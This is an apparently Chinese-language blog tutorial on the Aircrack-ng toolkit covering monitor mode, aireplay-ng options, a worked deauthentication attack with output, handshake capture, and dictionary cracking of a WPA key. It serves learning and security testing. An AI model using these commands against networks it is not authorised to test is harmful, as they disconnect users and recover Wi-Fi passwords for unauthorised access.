Aircrack-ng 工具箱

官網為：http://www.aircrack-ng.org/， 它就是一個與WiFi 相關的工具啦，可以進行一些注入，抓包、破解WiFI等。里面有很多不同的套件。

另外，http://blog.csdn.net/qq_28208251/ 翻譯了一部分官網上的內容，翻譯的可以的，不錯。

 

下面的知識可能有用：

1. 無線網卡可以工作在多種模式之下。常見的有Master，Managed，ad-hoc，monitor等模式。對於Master模式，它主要使用於無線接入點AP提供無線接入服務以及路由功能。Managed模式用於和無線AP進行接入連接，在這個模式下我們才可以進行無線接入internet上網。Monitor模式主要用於監控無線網絡內部的流量，用於檢查網絡和排錯。對於需要兩台主機進行直連的情況下可以使用ad-hoc模式，這樣主機之間是采用對等網絡的方式進行連接。

2. 通常，手機WLAN中，bssid其實就是無線路由的MAC地址.一般， ESSID 也可認為是SSID, WIFI 網絡名。

SSID = Service Set IDentifier
BSSID = Basic Service Set IDentifier
ESSIS = Extended Service Set IDentifier

 

 

airmon-ng工具：可以讓網卡在manged與monitor之間進行切換的。

使用方法：

1. 不加任何參數，顯示當前的接口狀態

airmon-ng

 

2. 開啟進入 monitor 狀態或停用； channel 項可選，表示監聽哪一個 channel， 如果不加時，它可以監聽所有 channel.

airmon-ng <start|stop> <interface name> [channel]           #如： airmon-ng start wlan0 11

用 iwlist 命令可以查看接口所監聽的 channel.  如：查看 mon0 ： 命令為： iwlist mon0 channel.

 

3. 核查所以能影響到aircrack-ng工作 NetworkManeger進程；或者核查並殺死影響aircrack-ng的NetworkManeger進程。

airmon-ng <check|check kill>

強烈推薦使用aircrack-ng套裝的時候停掉這些進程。

 

最后，當我們完成任務后，怎么回到起初的狀態？

    1.通過 airmon-ng stop <interface name> 來停止監聽狀態。

    2. 通過 service network-manager start 啟動我們殺死的 NetworkManeger服務。

 

Aireplay-ng 命令：

aireplay-ng是一個注入幀的工具。它的主要作用是產生數據流量，而這些隨后將會被用於aircrack-ng破解WEP和WPA/WPA2秘鑰。大部分的驅動需要補丁才能支持數據包注入，可參見此處安裝驅動。

aireplay-ng當前支持的攻擊種類如下：

• Attack 0：解除認證攻擊
• Attack 1：偽造認證攻擊
• Attack 2：交互式注入攻擊
• Attack 3：ARP請求包重放攻擊
• Attack 4：chopchop Korek攻擊
• Attack 5：碎片交錯攻擊
• Attack 6：Cafe-latte 攻擊
• Attack 7：面向客戶的碎片攻擊
• Attack 8：WPA遷移模式
• Attack 9：數據包注入測試

通過 man aireplay-ng ,可以查看它的相關參數的用法的。基本的參數有：

Filter 選項： 常用於除了解除認證攻擊和偽造認證攻擊之外的所有攻擊的參數，用於控制數據包。常用的選項為 –b.

• -b bssid ：AP(接入點）的MAC地址
• -d dmac：目的MAC地址
• -s smac：源MAC地址
• -m len：數據包最小長度
• -n len：數據包最大長度
• -u type：frame control, type field
• -v subt：frame control, subtype field
• -t tods：到目的地址的控制幀
• -f fromds：從目的地址出發的控制幀
• -w iswep：含有WEP數據的控制幀

Replay 選項：當注入（injecting 或 replay)數據包時，常用於下面的選項(通常用部分，而不是全部）.

• -x nbpps：設置每秒發送數據包的數目
• -p fctrl：設置控制幀中包含的信息（16進制）
• -a bssid：設置接入點的MAC地址 （access point mac address)
• -c dmac：設置目的MAC地址  (destination mac address)
• -h smac：設置源MAC地址 (sourse mac address)
• -e essid：虛假認證攻擊中，設置接入點名稱.當接入點不是隱藏時，它可以省略，反過來，它可心攻擊隱藏的接入點。（For fakeauth attack or injection test, it sets target AP SSID. This is optional when the SSID is not hidden.）
• -j：arpreplay attack : inject FromDS pkts

• -g value : change ring buffer size (default: 8)

• -k IP : set destination IP in fragments

• -l IP : set source IP in fragments

• -o npckts : number of packets per burst (-1)

• -q sec : seconds between keep-alives (-1)

• -y prga : keystream for shared key auth

• “-B” or “–bittest” : bit rate test (Applies only to test mode)

• “-D” :disables AP detection. Some modes will not proceed if the AP beacon is not heard. This disables this functionality.

• “-F” or “–fast” : chooses first matching packet. For test mode, it just checks basic injection and skips all other tests.

• “-R” disables /dev/rtc usage. Some systems experience lockups or other problems with RTC. This disables the usage.

來源選項：

• iface：從指定網卡捕獲數據包
• -r file：從指定pcap文件獲取數據包.

 

攻擊0：解除認證攻擊

這個攻擊的攻擊的作用可以把斷開已經連接至 AP 的 client. 用 –0 <count> 或 –deauth <count> 表示這個攻擊，其中 count 表示發送的斷開認證的數目，如果為0，表示不斷發送。

例如：

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 mon0

參數 ：前兩個參數即為： –0 <count> 或 –deauth <count> .  -0 表示為解除認證攻擊。1表示表示發送的斷開認證的數目。

        -a：表示設置接入點的MAC地址 （見Replay 選項）

        -c: 表示我們要斷開認證的客戶機的 MAC. 當我們省略時，會攻擊所有的已認證的client.

        mon0：為我的接口名稱（interface name).

 

如輸出：

sudo aireplay-ng --deauth 0 -a D4:EE:07:2E:02:D8 -c 20:A9:9B:2E:3D:A7 mon0
21:15:29  Waiting for beacon frame (BSSID: D4:EE:07:2E:02:D8) on channel 6
21:15:30  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [12|54 ACKs]
21:15:30  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [13|60 ACKs]
21:15:31  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [46|61 ACKs]
21:15:31  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|57 ACKs]
21:15:32  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 3|57 ACKs]
21:15:32  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 5|57 ACKs]
21:15:33  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [24|65 ACKs]
21:15:33  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [33|63 ACKs]
21:15:34  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|61 ACKs]
21:15:35  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|60 ACKs]
21:15:35  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 1|63 ACKs]
21:15:36  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 1|63 ACKs]
21:15:36  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|62 ACKs]
21:15:37  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|59 ACKs]
21:15:37  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|62 ACKs]
21:15:38  Sending 64 directed DeAuth. STMAC: [20:A9:9B:2E:3D:A7] [ 0|60 ACKs]

For directed deauthentications, aireplay-ng sends out a total of 128 packets for each deauth you specify. 64 packets are sent to the AP itself and 64 packets are sent to the client.

所以呢，上圖中的最后面代表分別來自 client 與 AP的回復。 最后的時候，由於斷開了連接，所以 client就不回復了。

 

攻擊1：偽造認證攻擊

用着了補。

 

airodump命令：是用來抓包的。

可以收集IVs,用於破解 WEP 不過現在已經基本沒有用WEP加密的路由器了吧。也可以抓握手包。它有很多的選項，可以通過 man ariodump 命令得到相關的幫助文檔，太多了。

 

 # 下面的內容指明了 各個縮寫詞的含義

BSSID：  接入點的MAC地址，在客戶端部分，“（not associated）”表示客戶端沒有連接到任何接入點。在這種沒有連接的狀態下，它一直會搜尋接入點

PWR     網卡反饋的信號水平，它的數值是驅動決定的，但是離接入點或基站越近，信號數值就會變得越大。如果接入點的PWR是-1，則表示驅動不支持信號水平；如果部分station的PWR是-1，則表示網卡能接收到接入點的數據包，但是卻超出了網卡的傳輸范圍。

        這就意味着我們只能監聽到1/2的信息交流。如果所有station都是-1，則表明驅動不支持顯示信號水平

RXQ：    接收質量，用過去100秒內成功接收到的數據包的百分比表示

Beacons：接入點發出的公告報文的數量，每個接入點每秒大概發送10個公告包（以最低的速率1M），所以通常相距較遠時也能收集到它們

Data：    捕捉到的數據包的數量（如果是WEP，則是不同IV的數量），包括數據廣播包

/s：      過去10秒每秒接收到的數據包數量

CH：      無線信道（從beacon包中得到），注意：即使固定了信道，有時也會捕捉到其他信道的數據包，這時由於無線電干擾造成的

MB：      接入點支持的最大速度。如果MB=11，就是802.1b，如果MB=22，就是802.1b+，更高的就是802.1g。如上圖54后的小數點表示支持短前導碼，11后面的e表示該網絡支持QoS

ENC：     表示使用的加密算法。OPN表示沒有加密，“WEP？”表示不確定是WEP還是WPA/WPA2；WEP表示靜態或者動態的WEP,TKIP或者CCMP表示WPA/WPA2

CIPHER：  檢測出的密碼體系，CCMP,WRAP,TKIP,WEP,WEP40和WEP104中的一種。雖然不是必須的，但是TKIP通常用於WPA，CCMP常用於WPA2。當鍵字索引大於0時，會顯示WEP40。（40位時，索引可以是0-3；104位時，索引需為0）

AUTH：    使用的認證協議。GMT（WPA/WPA2 使用單獨的認證服務器），SKA（WEP共享密鑰） ，PSK（WPA/WPA2 預共享密鑰），或者OPN（WEP開放認證）

ESSID：    無線網絡名稱。也叫“SSID”，如果開啟SSID隱藏模式，則此項為空。在這種情況下，airodump-ng會嘗試通過探測響應和關聯請求恢復SSID

STATION：  每一個已連接或者正嘗試連接用戶的MAC地址，還沒有連接上接入點的用戶的BSSID是“not associated”

Lost：     過去的10秒鍾丟失的數據包數量

Packets：  用戶發出的數據包數量

Probes：   用戶探測的無線網絡名稱，如果還沒有連接那么它是用戶正嘗試連接的網絡名稱

 

舉個例子哈：現在我要抓包啦：

airodump-ng --bbssid 00:14:6C:7A:41:20 -w mypackage mon0

#  --bbssid： 指明了要抓取的 AP的mac
# -w ：指明了抓到包的名字為mypackage
# mon0:：我的監聽接口的名字

然后呢，你的包就保存在了你的當前目錄里了。

 

aircrack-ng 命令：用於破解密碼。

Aircrack-ng是一個802.11的WEP和WPA/WPA2-PSK破解程序。對於破解 WPE 加密的，我們就不用管了，因為吧，現在幾乎沒有用WEP 加密的了。而對於WPA/WPA2共享密鑰，只有詞典比對這一種方法。SEE2則可以極大地加速這個漫長的比對過程。破解WPA/WPA2時，需要一個四次握手包作為輸入。對於WPA來說，需要4個包才能完成一次完整的握手，然而aircrack-ng只需要其中的兩個就能夠開始工作了。

通過man aircrack-ng 可以看到它的幫肋文檔

 

舉個例子：

sudo aircrack-ng -a wpa -w dictionary_simple.txt a-01.cap

上面是我自己抓的一個包a-01.cap, 然后用了一個簡單的字典:dictionary_simple.txt . 然后,破解,最后的結果如下:

Aircrack-ng 1.2 beta3


                                    [00:00:06] 10116 keys tested (1551.04 k/s)


                               KEY FOUND! [ 123456789 ]


                         Master Key     : 12 51 3C F8 F3 E5 6A A9 AE A3 5D 56 7B EF B1 F0 
                                          87 EE 44 98 E0 4C 25 61 0A 83 38 1A 7E 5A 01 71 

                        Transient Key  : CB F4 99 F7 96 8B DB CA 65 3F 57 89 A6 4E A5 15 
                                         19 61 0F CB A5 07 C7 42 01 66 6C 4B A4 D0 4A 89 
                                         4D 00 1A 4F 52 8E 35 44 06 28 BD 75 9E EB DA B7   

                                         63 0B 5C D9 6F 9C DE 5B 72 C0 CF 45 B6 D5 4B 6E 

                        EAPOL HMAC     : 52 2E 5F 0F 9E B4 7E 69 BD CA 26 D1 14 E2 93 BB                                                            

 

最后吧, windows下的一款跑包軟件：ewsa 比這個快，它可以用顯卡加速。